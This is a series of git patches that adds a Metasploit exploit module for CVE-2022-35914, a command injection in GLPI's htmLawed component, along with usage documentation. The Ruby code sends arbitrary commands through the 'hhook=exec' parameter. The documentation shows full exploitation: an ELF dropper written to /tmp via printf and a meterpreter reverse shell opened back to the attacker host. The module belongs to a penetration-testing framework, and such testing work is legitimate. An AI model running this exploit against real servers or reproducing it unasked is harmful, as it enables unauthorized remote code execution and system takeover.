From 56b8bf63020b16d442e5f17f75e314e829dbe9d9 Mon Sep 17 00:00:00 2001 From: bwatters Date: Wed, 19 Oct 2022 14:33:33 -0500 Subject: [PATCH 1/6] Working draft for CVE-2022-35914 --- .../linux/http/glpi_htmlawed_php_injection.rb | 138 ++++++++++++++++++ 1 file changed, 138 insertions(+) create mode 100644 modules/exploits/linux/http/glpi_htmlawed_php_injection.rb diff --git a/modules/exploits/linux/http/glpi_htmlawed_php_injection.rb b/modules/exploits/linux/http/glpi_htmlawed_php_injection.rb new file mode 100644 index 0000000000..83395b27aa --- /dev/null +++ b/modules/exploits/linux/http/glpi_htmlawed_php_injection.rb @@ -0,0 +1,138 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + prepend Msf::Exploit::Remote::AutoCheck + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::CmdStager + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'TODO', + 'Description' => %q{ + TODO + }, + 'License' => MSF_LICENSE, + 'Author' => [ + 'cosad3s', # PoC + 'bwatters-r7' # module + ], + 'References' => [ + ['CVE', '2022-35914' ], + ['URL', 'https://github.com/cosad3s/CVE-2022-35914-poc'] + ], + 'Platform' => 'linux', + 'Arch' => [ARCH_X64, ARCH_CMD], + 'Targets' => [ + [ + 'Unix Command', + { + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Type' => :unix_cmd, + 'DefaultOptions' => { + 'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp', + 'RPORT' => 80, + 'URIPATH' => '/glpi/' + } + } + ], + [ + 'Linux (Dropper)', + { + 'Platform' => 'linux', + 'Arch' => [ARCH_X64], + 'DefaultOptions' => { + 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp', + 'RPORT' => 80, + 'URIPATH' => '/glpi/' + }, + 'Type' => :linux_dropper + } + ], + ], + 'DisclosureDate' => '2022-01-26', + 'DefaultTarget' => 0, + 'Notes' => { + 'Stability' => [ CRASH_SAFE ], + 'Reliability' => [ REPEATABLE_SESSION ], + 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ] + } + ) + ) + end + + def populate_values + vprint_status('populate_values') + uri = "#{datastore['URIPATH']}/vendor/htmlawed/htmlawed/htmLawedTest.php" + begin + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(uri), + 'connection' => 'keep-alive', + 'accept' => '*/*' + }) + @html = res.get_html_document + @token = @html.at_xpath('//input[@id="token"]')['value'] + vprint_status("token = #{@token}") + + # sometimes I got > 1 sids. We must use the last one. + @sid = res.get_cookies.match(/.*=(.*?);.*/)[1] + vprint_status("sid = #{@sid}") + rescue NoMethodError => e + elog('Failed to retrieve token or sid', error: e) + end + end + + def run_command(cmd) + populate_values if @sid.nil? || @token.nil? + uri = datastore['URIPATH'] + '/vendor/htmlawed/htmlawed/htmLawedTest.php' + + send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(uri), + 'cookie' => 'sid=' + @sid, + 'ctype' => 'application/x-www-form-urlencoded', + 'encode_params' => true, + 'vars_post' => { + 'token' => @token, + 'text' => cmd, + 'hhook' => 'exec', + 'sid' => @sid + } + }) + end + + ## Takes in the command and creates a new route with it on the server + def execute_command(cmd, _opts = {}) + vprint_status('execute_command') + run_command(cmd) + end + + def check + populate_values if @html_doc.nil? + if @token.nil? || @sid.nil? || @html.nil? + return Exploit::CheckCode::Safe('Failed to retrieve htmlawed page') + end + return Exploit::CheckCode::Appears if @html.to_s.include?('htmLawed') + + return Exploit::CheckCode::Safe('Unable to determine htmlaewd status') + end + + def exploit + print_status("Executing #{target.name} for #{datastore['PAYLOAD']}") + case target['Type'] + when :unix_cmd + execute_command(payload.encoded) + when :linux_dropper + execute_cmdstager + end + end + +end From 238aa9058f1b7bdbc25bca4571edca90af900308 Mon Sep 17 00:00:00 2001 From: bwatters Date: Wed, 19 Oct 2022 17:18:20 -0500 Subject: [PATCH 2/6] Fix Cmdstager flavor, complete info hash --- .../linux/http/glpi_htmlawed_php_injection.rb | 19 +++++++------------ 1 file changed, 7 insertions(+), 12 deletions(-) diff --git a/modules/exploits/linux/http/glpi_htmlawed_php_injection.rb b/modules/exploits/linux/http/glpi_htmlawed_php_injection.rb index 83395b27aa..009b54b8ac 100644 --- a/modules/exploits/linux/http/glpi_htmlawed_php_injection.rb +++ b/modules/exploits/linux/http/glpi_htmlawed_php_injection.rb @@ -14,13 +14,14 @@ class MetasploitModule < Msf::Exploit::Remote super( update_info( info, - 'Name' => 'TODO', + 'Name' => 'GLPI htmLawed php command injection', 'Description' => %q{ - TODO + This exploit takes advantage of a unauthanticated php command injection available + from GLPI versions 10.0.2 and below to execute a command. }, 'License' => MSF_LICENSE, 'Author' => [ - 'cosad3s', # PoC + 'cosad3s', # PoC https://github.com/cosad3s/CVE-2022-35914-poc 'bwatters-r7' # module ], 'References' => [ @@ -29,6 +30,7 @@ class MetasploitModule < Msf::Exploit::Remote ], 'Platform' => 'linux', 'Arch' => [ARCH_X64, ARCH_CMD], + 'CmdStagerFlavor' => [ 'printf' ], 'Targets' => [ [ 'Unix Command', @@ -69,7 +71,6 @@ class MetasploitModule < Msf::Exploit::Remote end def populate_values - vprint_status('populate_values') uri = "#{datastore['URIPATH']}/vendor/htmlawed/htmlawed/htmLawedTest.php" begin res = send_request_cgi({ @@ -82,7 +83,7 @@ class MetasploitModule < Msf::Exploit::Remote @token = @html.at_xpath('//input[@id="token"]')['value'] vprint_status("token = #{@token}") - # sometimes I got > 1 sids. We must use the last one. + # sometimes I got > 1 sid. We must use the last one. @sid = res.get_cookies.match(/.*=(.*?);.*/)[1] vprint_status("sid = #{@sid}") rescue NoMethodError => e @@ -90,7 +91,7 @@ class MetasploitModule < Msf::Exploit::Remote end end - def run_command(cmd) + def execute_command(cmd, _opts = {}) populate_values if @sid.nil? || @token.nil? uri = datastore['URIPATH'] + '/vendor/htmlawed/htmlawed/htmLawedTest.php' @@ -109,12 +110,6 @@ class MetasploitModule < Msf::Exploit::Remote }) end - ## Takes in the command and creates a new route with it on the server - def execute_command(cmd, _opts = {}) - vprint_status('execute_command') - run_command(cmd) - end - def check populate_values if @html_doc.nil? if @token.nil? || @sid.nil? || @html.nil? From 78e8de826be326c5660e8c100edadcbed784a0a8 Mon Sep 17 00:00:00 2001 From: bwatters Date: Wed, 19 Oct 2022 17:22:29 -0500 Subject: [PATCH 3/6] Sure; I can spell --- modules/exploits/linux/http/glpi_htmlawed_php_injection.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/modules/exploits/linux/http/glpi_htmlawed_php_injection.rb b/modules/exploits/linux/http/glpi_htmlawed_php_injection.rb index 009b54b8ac..f1443e0f54 100644 --- a/modules/exploits/linux/http/glpi_htmlawed_php_injection.rb +++ b/modules/exploits/linux/http/glpi_htmlawed_php_injection.rb @@ -113,11 +113,11 @@ class MetasploitModule < Msf::Exploit::Remote def check populate_values if @html_doc.nil? if @token.nil? || @sid.nil? || @html.nil? - return Exploit::CheckCode::Safe('Failed to retrieve htmlawed page') + return Exploit::CheckCode::Safe('Failed to retrieve htmLawed page') end - return Exploit::CheckCode::Appears if @html.to_s.include?('htmLawed') + return Exploit::CheckCode::Appears if @html.to_s.include?('htmLawd') - return Exploit::CheckCode::Safe('Unable to determine htmlaewd status') + return Exploit::CheckCode::Safe('Unable to determine htmLawd status') end def exploit From 6039e54b75313966454f5ced345f2a9c1c8963e4 Mon Sep 17 00:00:00 2001 From: bwatters Date: Wed, 19 Oct 2022 17:23:16 -0500 Subject: [PATCH 4/6] For real, this time --- modules/exploits/linux/http/glpi_htmlawed_php_injection.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/exploits/linux/http/glpi_htmlawed_php_injection.rb b/modules/exploits/linux/http/glpi_htmlawed_php_injection.rb index f1443e0f54..cecf08e5d9 100644 --- a/modules/exploits/linux/http/glpi_htmlawed_php_injection.rb +++ b/modules/exploits/linux/http/glpi_htmlawed_php_injection.rb @@ -115,9 +115,9 @@ class MetasploitModule < Msf::Exploit::Remote if @token.nil? || @sid.nil? || @html.nil? return Exploit::CheckCode::Safe('Failed to retrieve htmLawed page') end - return Exploit::CheckCode::Appears if @html.to_s.include?('htmLawd') + return Exploit::CheckCode::Appears if @html.to_s.include?('htmLawed') - return Exploit::CheckCode::Safe('Unable to determine htmLawd status') + return Exploit::CheckCode::Safe('Unable to determine htmLawed status') end def exploit From 73c879a854ca18d33d094d6b17c61f5e5540cfd7 Mon Sep 17 00:00:00 2001 From: bwatters Date: Wed, 19 Oct 2022 17:59:54 -0500 Subject: [PATCH 5/6] Add docs --- .../linux/http/glpi_htmlawed_php_injection.md | 146 ++++++++++++++++++ 1 file changed, 146 insertions(+) create mode 100644 documentation/modules/exploit/linux/http/glpi_htmlawed_php_injection.md diff --git a/documentation/modules/exploit/linux/http/glpi_htmlawed_php_injection.md b/documentation/modules/exploit/linux/http/glpi_htmlawed_php_injection.md new file mode 100644 index 0000000000..182cb7692e --- /dev/null +++ b/documentation/modules/exploit/linux/http/glpi_htmlawed_php_injection.md @@ -0,0 +1,146 @@ +## Vulnerable Application + +GLPI versions 10.0.2 and below expose a vulnerable version on htmLawed which +has a php command injection opportunity. + +### Installation Instructions +Taken verbatim from https://www.imaginelinux.com/install-glpi-ubuntu/ +Using Ubuntu x64 Desktop 20.04.1 +1. ```sudo apt install apache2 php7.4 php7.4-curl php7.4-zip php7.4-gd php7.4-intl \ + php7.4-intl php-pear php7.4-imagick php-bz2 php7.4-imap php-memcache php7.4-pspell \ + php7.4-tidy php7.4-xmlrpc php7.4-xsl php7.4-mbstring php7.4-ldap php-cas php-apcu \ + libapache2-mod-php7.4 php7.4-mysql mariadb-server``` +2. `sudo systemctl status apache2` +3. `sudo systemctl status mariadb` +4. `sudo mysql_secure_installation` # Answer 'yes' to everything +5. `sudo mysql -u root -p` +6. `CREATE DATABASE glpidb;` +7. `GRANT ALL PRIVILEGES ON glpidb.* TO 'user'@'localhost' IDENTIFIED BY 'password';` +8. `FLUSH PRIVILEGES;` +9. `exit;` +10. Grab a vulnerable version here: https://github.com/glpi-project/glpi/releases/ +11. Extract that vulnerable version and move the files to `/var/www/html/glpi/` +12. `sudo chmod 755 -R /var/www/html/` +13. `sudo chown www-data:www-data -R /var/www/html/` +14. Create a virtual host if you want `sudo nano /etc/apache2/sites-available/glpi.conf` +``` + ServerAdmin admin@your_domain.com + DocumentRoot /var/www/html/glpi + ServerName your-domain.com + + + Options FollowSymlinks + AllowOverride All + Require all granted + + + ErrorLog ${APACHE_LOG_DIR}/your-domain.com_error.log + CustomLog ${APACHE_LOG_DIR}/your-domain.com_access.log combined + + +``` + +15. `sudo ln -s /etc/apache2/sites-available/glpi.conf /etc/apache2/sites-enabled/glpi.conf` +16. `sudo a2enmod rewrite` +17. `sudo systemctl restart apache2` +18. Visit the new server at http:///glpi +19. Follow setup instructions on screen + +## Options +No extra options to be set, but make sure the uripath is correct + +## Verification Steps +* Do: `msfconsole` +* Do: `use exploit/linux/http/glpi_htmlawed_php_injection` +* Do: `set upripath ` +* Do: `set rhost ` +* Do: `set lhost ` +* Do: **Verify** you get a session + +## Scenarios +### Using GLPI 9.5.9 running on Ubuntu 20.04.1 x64 +#### Linux Dropper +``` +msf6 exploit(linux/http/glpi_htmlawed_php_injection) > show options + +Module options (exploit/linux/http/glpi_htmlawed_php_injection): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + Proxies no A proxy chain of format type:host:port[,type:host:port][...] + RHOSTS 10.5.132.190 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit + RPORT 80 yes The target port (TCP) + SSL false no Negotiate SSL/TLS for outgoing connections + SSLCert no Path to a custom SSL certificate (default is randomly generated) + URIPATH /glpi/glpi/ no The URI to use for this exploit (default is random) + VHOST no HTTP server virtual host + + +Payload options (linux/x64/meterpreter/reverse_tcp): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + LHOST 10.5.135.109 yes The listen address (an interface may be specified) + LPORT 4444 yes The listen port + + +Exploit target: + + Id Name + -- ---- + 1 Linux (Dropper) + + +msf6 exploit(linux/http/glpi_htmlawed_php_injection) > run + +[*] Started reverse TCP handler on 10.5.135.109:4444 +[*] Running automatic check ("set AutoCheck false" to disable) +[*] token = 4578e2880dfc8091a10c38ea60ead228 +[*] sid = vitn15j8j9f0lljrfu7daq9es8 +[+] The target appears to be vulnerable. +[*] Executing Linux (Dropper) for linux/x64/meterpreter/reverse_tcp +[*] Generated command stager: ["printf '\\177\\105\\114\\106\\2\\1\\1\\0\\0\\0\\0\\0\\0\\0\\0\\0\\2\\0\\76\\0\\1\\0\\0\\0\\170\\0\\100\\0\\0\\0\\0\\0\\100\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\100\\0\\70\\0\\1\\0\\0\\0\\0\\0\\0\\0\\1\\0\\0\\0\\7\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\100\\0\\0\\0\\0\\0\\0\\0\\100\\0\\0\\0\\0\\0\\372\\0\\0\\0\\0\\0\\0\\0\\174\\1\\0\\0\\0\\0\\0\\0\\0\\20\\0\\0\\0\\0\\0\\0\\110\\61\\377\\152\\11\\130\\231\\266\\20\\110\\211\\326\\115\\61\\311\\152\\42\\101\\132\\262\\7\\17\\5\\110\\205\\300\\170\\121\\152\\12\\101\\131\\120\\152\\51\\130\\231\\152\\2\\137\\152\\1\\136\\17\\5\\110\\205\\300\\170\\73\\110\\227\\110\\271\\2\\0\\21\\134\\12\\5\\207\\155\\121\\110\\211\\346\\152\\20\\132\\152\\52\\130\\17\\5\\131\\110\\205\\300\\171\\45\\111\\377\\311\\164\\30\\127\\152\\43\\130\\152\\0\\152\\5\\110\\211\\347\\110\\61\\366\\17\\5\\131\\131\\137\\110\\205\\300\\171\\307\\152\\74\\130\\152\\1\\137\\17\\5\\136\\152\\176\\132\\17\\5\\110\\205\\300\\170\\355\\377\\346'>>/tmp/bLaTw ; chmod +x /tmp/bLaTw ; /tmp/bLaTw ; rm -f /tmp/bLaTw"] +[*] execute_command +[*] Transmitting intermediate stager...(126 bytes) +[*] Sending stage (3045348 bytes) to 10.5.132.190 +[*] Command Stager progress - 100.00% done (809/809 bytes) +[*] Meterpreter session 4 opened (10.5.135.109:4444 -> 10.5.132.190:36378) at 2022-10-19 17:05:28 -0500 + +meterpreter > sysinfo +Computer : 10.5.132.190 +OS : Ubuntu 20.04 (Linux 5.15.0-52-generic) +Architecture : x64 +BuildTuple : x86_64-linux-musl +Meterpreter : x64/linux +meterpreter > exit +[*] Shutting down Meterpreter... +``` + +#### Unix Command +``` +[*] 10.5.132.190 - Meterpreter session 4 closed. Reason: Died +smsf6 exploit(linux/http/glpi_htmlawed_php_injection) > set target 0 +target => 0 +msf6 exploit(linux/http/glpi_htmlawed_php_injection) > set payload cmd/unix/python/meterpreter/reverse_tcp +payload => cmd/unix/python/meterpreter/reverse_tcp +msf6 exploit(linux/http/glpi_htmlawed_php_injection) > run + +[*] Started reverse TCP handler on 10.5.135.109:4444 +[*] Running automatic check ("set AutoCheck false" to disable) +[*] token = 154f788cf9a685dac8753df78c6c3a1c +[*] sid = 1mcp7n5vq9v6tnqlbm324qk9ce +[+] The target appears to be vulnerable. +[*] Executing Unix Command for cmd/unix/python/meterpreter/reverse_tcp +[*] execute_command +[*] Sending stage (40168 bytes) to 10.5.132.190 +[*] Meterpreter session 5 opened (10.5.135.109:4444 -> 10.5.132.190:39622) at 2022-10-19 17:06:36 -0500 + +meterpreter > sysinfo +Computer : ubuntu-20041 +OS : Linux 5.15.0-52-generic #58~20.04.1-Ubuntu SMP Thu Oct 13 13:09:46 UTC 2022 +Architecture : x64 +System Language : C +Meterpreter : python/linux +meterpreter > exit +[*] Shutting down Meterpreter... +``` From 3bbd05a11a6b25668fc71a68d6415e52f6311fd5 Mon Sep 17 00:00:00 2001 From: jheysel-r7 Date: Mon, 24 Oct 2022 11:48:33 -0400 Subject: [PATCH 6/6] Update modules/exploits/linux/http/glpi_htmlawed_php_injection.rb Co-authored-by: Brendan --- modules/exploits/linux/http/glpi_htmlawed_php_injection.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/glpi_htmlawed_php_injection.rb b/modules/exploits/linux/http/glpi_htmlawed_php_injection.rb index cecf08e5d9..405b20b829 100644 --- a/modules/exploits/linux/http/glpi_htmlawed_php_injection.rb +++ b/modules/exploits/linux/http/glpi_htmlawed_php_injection.rb @@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote info, 'Name' => 'GLPI htmLawed php command injection', 'Description' => %q{ - This exploit takes advantage of a unauthanticated php command injection available + This exploit takes advantage of a unauthenticated php command injection available from GLPI versions 10.0.2 and below to execute a command. }, 'License' => MSF_LICENSE,